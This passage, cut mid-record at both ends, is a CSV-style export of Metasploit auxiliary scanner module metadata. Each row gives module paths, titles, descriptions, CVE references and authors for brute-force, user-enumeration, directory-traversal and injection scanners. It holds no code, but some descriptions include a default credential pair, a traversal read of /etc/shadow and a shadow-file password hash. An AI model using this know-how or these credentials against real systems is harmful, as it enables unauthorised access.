00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/owa_login.rb","auxiliary","scanner/http/owa_login","auxiliary/scanner/http/owa_login","Outlook Web App (OWA) Brute Force Utility",300,"This module tests credentials on OWA 2003, 2007 and 2010 servers. 
The default action is set to OWA 2010.","Metasploit Framework License (BSD)","f",,,"OWA 2010","aggressive","t",,"SecureState R&D Team, Spencer McIntyre, Vitor Moreira, sinn3r " 1522,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb","auxiliary","scanner/http/prev_dir_same_name_file","auxiliary/scanner/http/prev_dir_same_name_file","HTTP Previous Directory File Scanner",300,"This module identifies files in the first parent directory with same name as the given directory path. Example: Test /backup/files/ will look for the following files /backup/files.ext .","BSD License","f",,,,"aggressive","t",,"et " 1523,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb","auxiliary","scanner/http/rails_json_yaml_scanner","auxiliary/scanner/http/rails_json_yaml_scanner","Ruby on Rails JSON Processor YAML Deserialization Scanner",300,"This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the JSON request processor.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-0333","hdm , jjarmoc" 1524,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rails_mass_assignment.rb","auxiliary","scanner/http/rails_mass_assignment","auxiliary/scanner/http/rails_mass_assignment","Ruby On Rails Attributes Mass Assignment Scanner",300,"This module scans Ruby On Rails sites for models with attributes not protected by attr_protected or attr_accessible. 
After attempting to assign a non-existent field, the default rails with active_record setup will raise an ActiveRecord::UnknownAttributeError exeption, and reply with HTTP code 500.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://guides.rubyonrails.org/security.html#mass-assignment","Gregory Man " 1525,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb","auxiliary","scanner/http/rails_xml_yaml_scanner","auxiliary/scanner/http/rails_xml_yaml_scanner","Ruby on Rails XML Processor YAML Deserialization Scanner",300,"This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the XML request processor.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-0156, URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156","hdm , jjarmoc" 1526,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/replace_ext.rb","auxiliary","scanner/http/replace_ext","auxiliary/scanner/http/replace_ext","HTTP File Extension Scanner",300,"This module identifies the existence of additional files by modifying the extension of an existing file.","BSD License","f",,,,"aggressive","t",,"et " 1527,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb","auxiliary","scanner/http/rewrite_proxy_bypass","auxiliary/scanner/http/rewrite_proxy_bypass","Apache Reverse Proxy Bypass Vulnerability Scanner",300,"Scan for poorly configured reverse proxy servers. By default, this module attempts to force the server to make a request with an invalid domain name. Then, if the bypass is successful, the server will look it up and of course fail, then responding with a status code 502. A baseline status code is always established and if that baseline matches your test status code, the injection attempt does not occur. 
""set VERBOSE true"" if you are paranoid and want to catch potential false negatives. Works best against Apache and mod_rewrite","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-3368, URL-http://www.contextis.com/research/blog/reverseproxybypass/","chao-mu" 1528,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/robots_txt.rb","auxiliary","scanner/http/robots_txt","auxiliary/scanner/http/robots_txt","HTTP Robots.txt Content Scanner",300,"Detect robots.txt files and analize its content","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1529,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/s40_traversal.rb","auxiliary","scanner/http/s40_traversal","auxiliary/scanner/http/s40_traversal","S40 0.4.2 CMS Directory Traversal Vulnerability",300,"This module exploits a directory traversal vulnerability found in S40 CMS. The flaw is due to the 'page' function not properly handling the $pid parameter, which allows a malicious user to load an arbitrary file path.","Metasploit Framework License (BSD)","f","2011-04-07 00:00:00",,,"aggressive","t","EDB-17129, OSVDB-82469","Osirys , sinn3r " 1530,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb","auxiliary","scanner/http/sap_businessobjects_user_brute","auxiliary/scanner/http/sap_businessobjects_user_brute","SAP BusinessObjects User Bruteforcer",300,"This module attempts to bruteforce SAP BusinessObjects users. The dswsbobje interface is only used to verify valid credentials for CmcApp. 
Therefore, any valid credentials that have been identified can be leveraged by logging into CmcApp.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1531,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb","auxiliary","scanner/http/sap_businessobjects_user_brute_web","auxiliary/scanner/http/sap_businessobjects_user_brute_web","SAP BusinessObjects Web User Bruteforcer",300,"This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1532,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb","auxiliary","scanner/http/sap_businessobjects_user_enum","auxiliary/scanner/http/sap_businessobjects_user_enum","SAP BusinessObjects User Enumeration",300,"This module simply attempts to enumerate SAP BusinessObjects users. The dswsbobje interface is only used to verify valid users for CmcApp. 
Therefore, any valid users that have been identified can be leveraged by logging into CmcApp.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1533,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb","auxiliary","scanner/http/sap_businessobjects_version_enum","auxiliary/scanner/http/sap_businessobjects_version_enum","SAP BusinessObjects Version Detection",300,"This module simply attempts to identify the version of SAP BusinessObjects.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1534,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/scraper.rb","auxiliary","scanner/http/scraper","auxiliary/scanner/http/scraper","HTTP Page Scraper",300,"Scrape defined data from a specific web page based on a regular expression","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1535,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/simple_webserver_traversal.rb","auxiliary","scanner/http/simple_webserver_traversal","auxiliary/scanner/http/simple_webserver_traversal","Simple Web Server 2.3-RC1 Directory Traversal",300,"This module exploits a directory traversal vulnerability found in Simple Web Server 2.3-RC1.","Metasploit Framework License (BSD)","f","2013-01-03 00:00:00",,,"aggressive","t","EDB-23886, OSVDB-88877, URL-http://seclists.org/bugtraq/2013/Jan/12","CwG GeNiuS, sinn3r " 1536,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/soap_xml.rb","auxiliary","scanner/http/soap_xml","auxiliary/scanner/http/soap_xml","HTTP SOAP Verb/Noun Brute Force Scanner",300,"This module attempts to brute force SOAP/XML requests to uncover hidden methods.","Metasploit 
Framework License (BSD)","f",,,,"aggressive","t",,"patrick " 1537,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sockso_traversal.rb","auxiliary","scanner/http/sockso_traversal","auxiliary/scanner/http/sockso_traversal","Sockso Music Host Server 1.5 Directory Traversal",300,"This module exploits a directory traversal bug in Sockso on port 4444. This is done by using ""../"" in the path to retrieve a file on a vulnerable machine.","Metasploit Framework License (BSD)","f","2012-03-14 00:00:00",,,"aggressive","t","URL-http://aluigi.altervista.org/adv/sockso_1-adv.txt","Luigi Auriemma, sinn3r " 1538,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/splunk_web_login.rb","auxiliary","scanner/http/splunk_web_login","auxiliary/scanner/http/splunk_web_login","Splunk Web interface Login Utility",300,"This module simply attempts to login to a Splunk web interface. Please note the free version of Splunk actually does not require any authentication, in that case the module will abort trying. Also, some Splunk applications still have the default credential 'admin:changeme' written on the login page. If this default credential is found, the module will also store that information, and then move on to trying more passwords.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak , sinn3r " 1539,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sqlmap.rb","auxiliary","scanner/http/sqlmap","auxiliary/scanner/http/sqlmap","SQLMAP SQL Injection External Module",300,"This module launches a sqlmap session. sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. 
Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.","BSD License","f",,,,"aggressive","t","URL-http://sqlmap.sourceforge.net","Bernardo Damele A. G. " 1540,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/squid_pivot_scanning.rb","auxiliary","scanner/http/squid_pivot_scanning","auxiliary/scanner/http/squid_pivot_scanning","Squid Proxy Port Scanner",300,"A misconfigured Squid proxy can allow an attacker to make requests on his behalf. This may give the attacker information about devices that he cannot reach but the Squid proxy can. For example, an attacker can make requests for internal IP addresses against a misconfigured open Squid proxy exposed to the Internet, therefore performing an internal port scan. The error messages returned by the proxy are used to determine if the port is open or not. Many Squid proxies use custom error codes so your mileage may vary. The open_proxy module can be used to test for open proxies, though a Squid proxy does not have to be open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows the attacker to pivot to another part of the network).","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"willis" 1541,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb","auxiliary","scanner/http/squiz_matrix_user_enum","auxiliary/scanner/http/squiz_matrix_user_enum","Squiz Matrix User Enumeration Scanner",300,"This module attempts to enumerate remote users that exist within the Squiz Matrix and MySource Matrix CMS by sending GET requests for asset IDs e.g. 
?a=14 and searching for a valid username e.g. ""~root"" or ""~test"" which is prefixed by a ""~"" in the response. It will also try to GET the user's full name or description, or other information. You may wish to modify ASSETBEGIN and ASSETEND values for greater results, or set VERBOSE. Information gathered may be used for later bruteforce attacks.","Metasploit Framework License (BSD)","f","2011-11-08 00:00:00",,,"aggressive","t","URL-http://www.osisecurity.com.au/advisories/","Troy Rose , patrick " 1542,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/ssl.rb","auxiliary","scanner/http/ssl","auxiliary/scanner/http/ssl","HTTP SSL Certificate Information",300,"Parse the server SSL certificate to obtain the common name and signature algorithm","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Chris John Riley, Veit Hailperin , et " 1543,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/svn_scanner.rb","auxiliary","scanner/http/svn_scanner","auxiliary/scanner/http/svn_scanner","HTTP Subversion Scanner",300,"Detect subversion directories and files and analyze their content. Only SVN Version > 7 supported","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1544,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb","auxiliary","scanner/http/svn_wcdb_scanner","auxiliary/scanner/http/svn_wcdb_scanner","SVN wc.db Scanner",300,"Scan for servers that allow access to the SVN wc.db file. 
Based on the work by Tim Medin.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us#","Stephen Haywood " 1545,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb","auxiliary","scanner/http/sybase_easerver_traversal","auxiliary/scanner/http/sybase_easerver_traversal","Sybase Easerver 6.3 Directory Traversal",300,"This module exploits a directory traversal vulnerability found in Sybase EAserver's Jetty webserver on port 8000. Code execution seems unlikely with EAserver's default configuration unless the web server allows WRITE permission.","Metasploit Framework License (BSD)","f","2011-05-25 00:00:00",,,"aggressive","t","CVE-2011-2474, OSVDB-72498, URL-http://www.sybase.com/detail?id=1093216, URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=912","Sow Ching Shiong, sinn3r " 1546,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb","auxiliary","scanner/http/symantec_brightmail_logfile","auxiliary/scanner/http/symantec_brightmail_logfile","Symantec Messaging Gateway 9.5 Log File Download Vulnerability",300,"This module will download a file of your choice against Symantec Messaging Gateway. This is possible by exploiting a directory traversal vulnerability when handling the 'logFile' parameter, which will load an arbitrary file as an attachment. 
Note that authentication is required in order to successfully download your file.","Metasploit Framework License (BSD)","f","2012-11-30 00:00:00",,,"aggressive","t","BID-56789, CVE-2012-4347, EDB-23110, OSVDB-88165, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00","Ben Williams , sinn3r " 1547,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb","auxiliary","scanner/http/titan_ftp_admin_pwd","auxiliary/scanner/http/titan_ftp_admin_pwd","Titan FTP Administrative Password Disclosure",300,"On Titan FTP servers prior to version 9.14.1628, an attacker can retrieve the username and password for the administrative XML-RPC interface, which listens on TCP Port 31001 by default, by sending an XML request containing bogus authentication information. After sending this request, the server responds with the legitimate username and password for the service. 
With this information, an attacker has complete control over the FTP service, which includes the ability to add and remove FTP users, as well as add, remove, and modify available directories and their permissions.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-1625","Spencer McIntyre" 1548,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/tomcat_enum.rb","auxiliary","scanner/http/tomcat_enum","auxiliary/scanner/http/tomcat_enum","Apache Tomcat User Enumeration",300,"Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-35196, CVE-2009-0580, OSVDB-55055","Alligator Security Team, Heyder Andrade , Leandro Oliveira " 1549,"2013-05-30 14:36:26","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/tomcat_mgr_login.rb","auxiliary","scanner/http/tomcat_mgr_login","auxiliary/scanner/http/tomcat_mgr_login","Tomcat Application Manager Login Utility",300,"This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-36954, BID-37086, BID-38084, CVE-1999-0502, CVE-2009-3548, CVE-2009-3843, CVE-2009-4188, CVE-2009-4189, CVE-2010-0557, CVE-2010-4094, OSVDB-60176, OSVDB-60317, OSVDB-60670, URL-http://tomcat.apache.org/, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179, URL-http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-085/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-214/","MC , Matteo Cantoni , jduck " 1550,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb","auxiliary","scanner/http/tplink_traversal_noauth","auxiliary/scanner/http/tplink_traversal_noauth","TP-Link Wireless Lite N Access Point Directory 
Traversal Vulnerability",300,"This module tests whether a directory traversal vulnerability is present in versions of TP-Link Access Point 3.12.16 Build 120228 Rel.37317n.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-57969, CVE-2012-5687, EDB-24504, OSVDB-86881, URL-http://www.s3cur1ty.de/m1adv2013-011, URL-http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1","Michael Messner " 1551,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/trace.rb","auxiliary","scanner/http/trace","auxiliary/scanner/http/trace","HTTP TRACE Detection",300,"Test if TRACE is actually enabled. 405 (Apache) or 501 (IIS) if it's disabled, 200 if it is enabled","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"CG " 1552,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/trace_axd.rb","auxiliary","scanner/http/trace_axd","auxiliary/scanner/http/trace_axd","HTTP trace.axd Content Scanner",300,"Detect trace.axd files and analyze their content","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"c4an" 1553,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vcms_login.rb","auxiliary","scanner/http/vcms_login","auxiliary/scanner/http/vcms_login","V-CMS Login Utility",300,"This module attempts to authenticate to an English-based V-CMS login interface. 
It should only work against version v1.1 or older, because these versions do not have any default protections against bruteforcing.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"sinn3r " 1554,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/verb_auth_bypass.rb","auxiliary","scanner/http/verb_auth_bypass","auxiliary/scanner/http/verb_auth_bypass","HTTP Verb Authentication Bypass Scanner",300,"This module tests for authentication bypass using different HTTP verbs.","BSD License","f",,,,"aggressive","t",,"et " 1555,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vhost_scanner.rb","auxiliary","scanner/http/vhost_scanner","auxiliary/scanner/http/vhost_scanner","HTTP Virtual Host Brute Force Scanner",300,"This module tries to identify unique virtual hosts hosted by the target web server.","BSD License","f",,,,"aggressive","t",,"et " 1556,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb","auxiliary","scanner/http/vmware_server_dir_trav","auxiliary/scanner/http/vmware_server_dir_trav","VMware Server Directory Traversal Vulnerability",300,"This module exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5, which allows remote attackers to read arbitrary files. Common VMware server ports are 80/8222 and 443/8333 (SSL). 
If you want to download the entire VM, check out the gueststealer tool.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-36842, CVE-2009-3733, OSVDB-59440, URL-http://fyrmassociates.com/tools/gueststealer-v1.1.pl, URL-http://www.vmware.com/security/advisories/VMSA-2009-0015.html","CG " 1557,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb","auxiliary","scanner/http/vmware_update_manager_traversal","auxiliary/scanner/http/vmware_update_manager_traversal","VMWare Update Manager 4 Directory Traversal",300,"This module exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4.","Metasploit Framework License (BSD)","f","2011-11-21 00:00:00",,,"aggressive","t","CVE-2011-4404, EDB-18138, URL-http://dsecrg.com/pages/vul/show.php?id=342, URL-http://www.vmware.com/security/advisories/VMSA-2011-0014.html","Alexey Sintsov, sinn3r " 1558,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/wangkongbao_traversal.rb","auxiliary","scanner/http/wangkongbao_traversal","auxiliary/scanner/http/wangkongbao_traversal","WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal",300,"This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka Network Security Platform. This directory traversal vulnerability is interesting because the apache server is running as root, this means we can grab anything we want! 
For instance, the /etc/shadow and /etc/passwd files for the special kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user","Metasploit Framework License (BSD)","f",,,,"aggressive","t","EDB-19526","Dillon Beresford" 1559,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/web_vulndb.rb","auxiliary","scanner/http/web_vulndb","auxiliary/scanner/http/web_vulndb","HTTP Vuln Scanner",300,"This module identifies common vulnerable files or cgis.","BSD License","f",,,,"aggressive","t",,"et " 1560,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webdav_internal_ip.rb","auxiliary","scanner/http/webdav_internal_ip","auxiliary/scanner/http/webdav_internal_ip","HTTP WebDAV Internal IP Scanner",300,"Detect webservers' internal IPs through WebDAV","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1561,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webdav_scanner.rb","auxiliary","scanner/http/webdav_scanner","auxiliary/scanner/http/webdav_scanner","HTTP WebDAV Scanner",300,"Detect webservers with WebDAV enabled","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1562,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webdav_website_content.rb","auxiliary","scanner/http/webdav_website_content","auxiliary/scanner/http/webdav_website_content","HTTP WebDAV Website Content Scanner",300,"Detect webservers disclosing their content through WebDAV","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1563,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webpagetest_traversal.rb","auxiliary","scanner/http/webpagetest_traversal","auxiliary/scanner/http/webpagetest_traversal","WebPageTest Directory Traversal",300,"This module exploits a directory traversal vulnerability found in WebPageTest. 
Due to the way the gettext.php script handles the 'file' parameter, it is possible to read a file outside the www directory.","Metasploit Framework License (BSD)","f","2012-07-13 00:00:00",,,"aggressive","t","EDB-19790, OSVDB-83817","dun, sinn3r " 1564,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/wordpress_login_enum.rb","auxiliary","scanner/http/wordpress_login_enum","auxiliary/scanner/http/wordpress_login_enum","Wordpress Brute Force and User Enumeration Utility",300,"Wordpress Authentication Brute Force and User Enumeration Utility","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-35581, CVE-2009-2335, OSVDB-55713","Alligator Security Team, Tiago Ferreira , Zach Grace " 1565,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/wordpress_pingback_access.rb","auxiliary","scanner/http/wordpress_pingback_access","auxiliary/scanner/http/wordpress_pingback_access","Wordpress Pingback Locator",300,"This module will scan for wordpress sites with the Pingback API enabled. By interfacing with the API an attacker can cause the wordpress site to port scan an external target and return results. Refer to the wordpress_pingback_portscanner module. 
This issue was fixed in wordpress 3.5.1","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/, URL-http://www.securityfocus.com/archive/1/525045/30/30/threaded, URL-https://github.com/FireFart/WordpressPingbackPortScanner","Brandon McCann ""zeknox"" , Christian Mehlmauer ""FireFart"" , Thomas McCarthy ""smilingraccoon"" " 1566,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/xpath.rb","auxiliary","scanner/http/xpath","auxiliary/scanner/http/xpath","HTTP Blind XPATH 1.0 Injector",300,"This module exploits blind XPATH 1.0 injections over HTTP GET requests.","BSD License","f",,,,"aggressive","t",,"et " 1567,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/yaws_traversal.rb","auxiliary","scanner/http/yaws_traversal","auxiliary/scanner/http/yaws_traversal","Yaws Web Server Directory Traversal",300,"This module exploits a directory traversal bug in Yaws v1.9.1 or less. The module can only be used to retrieve files. However, code execution might be possible, because when the malicious user sends a PUT request, a file is actually created, except no content is written.","Metasploit Framework License (BSD)","f","2011-11-25 00:00:00",,,"aggressive","t","CVE-2011-4350, OSVDB-77581, URL-https://bugzilla.redhat.com/show_bug.cgi?id=757181","sinn3r " 1568,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb","auxiliary","scanner/http/zenworks_assetmanagement_fileaccess","auxiliary/scanner/http/zenworks_assetmanagement_fileaccess","Novell ZENworks Asset Management 7.5 Remote File Access",300,"This module exploits a hardcoded user and password for the GetFile maintenance task in Novell ZENworks Asset Management 7.5. 
The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of remote files. This module has been successfully tested on Novell ZENworks Asset Management 7.5.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-4933, URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks","juan vazquez " 1569,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb","auxiliary","scanner/http/zenworks_assetmanagement_getconfig","auxiliary/scanner/http/zenworks_assetmanagement_getconfig","Novell ZENworks Asset Management 7.5 Configuration Access",300,"This module exploits a hardcoded user and password for the GetConfig maintenance task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve the configuration parameters of Novell ZENworks Asset Management, including the database credentials in clear text. 
This module has been successfully tested on Novell ZENworks Asset Management 7.5.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-4933, URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks","juan vazquez " 1570,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/imap/imap_version.rb","auxiliary","scanner/imap/imap_version","auxiliary/scanner/imap/imap_version","IMAP4 Banner Grabber",300,"IMAP4 Banner Grabber","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1571,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ip/ipidseq.rb","auxiliary","scanner/ip/ipidseq","auxiliary/scanner/ip/ipidseq","IPID Sequence Scanner",300,"This module will probe hosts' IPID sequences and classify them using the same method Nmap uses when it's performing its IPID Idle Scan (-sI) and OS Detection (-O). Nmap's probes are SYN/ACKs while this module's are SYNs. While this does not change the underlying functionality, it does change the chance of whether or not the probe will be stopped by a firewall. 
Nmap's Idle Scan can use hosts whose IPID sequences are classified as ""Incremental"" or ""Broken little-endian incremental"".","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1572,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb","auxiliary","scanner/lotus/lotus_domino_hashes","auxiliary/scanner/lotus/lotus_domino_hashes","Lotus Domino Password Hash Collector",300,"Get users passwords hashes from names.nsf page","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Tiago Ferreira " 1573,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/lotus/lotus_domino_login.rb","auxiliary","scanner/lotus/lotus_domino_login","auxiliary/scanner/lotus/lotus_domino_login","Lotus Domino Brute Force Utility",300,"Lotus Domino Authentication Brute Force Utility","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Tiago Ferreira " 1574,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/lotus/lotus_domino_version.rb","auxiliary","scanner/lotus/lotus_domino_version","auxiliary/scanner/lotus/lotus_domino_version","Lotus Domino Version",300,"Several checks to determine Lotus Domino Server Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"CG " 1575,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/cctv_dvr_login.rb","auxiliary","scanner/misc/cctv_dvr_login","auxiliary/scanner/misc/cctv_dvr_login","CCTV DVR Login Scanning Utility",300,"This module tests for standalone CCTV DVR video surveillance deployments specifically by MicroDigital, HIVISION, CTRing, and numerous other rebranded devices that are utilizing default vendor passwords. Additionally, this module has the ability to brute force user accounts. 
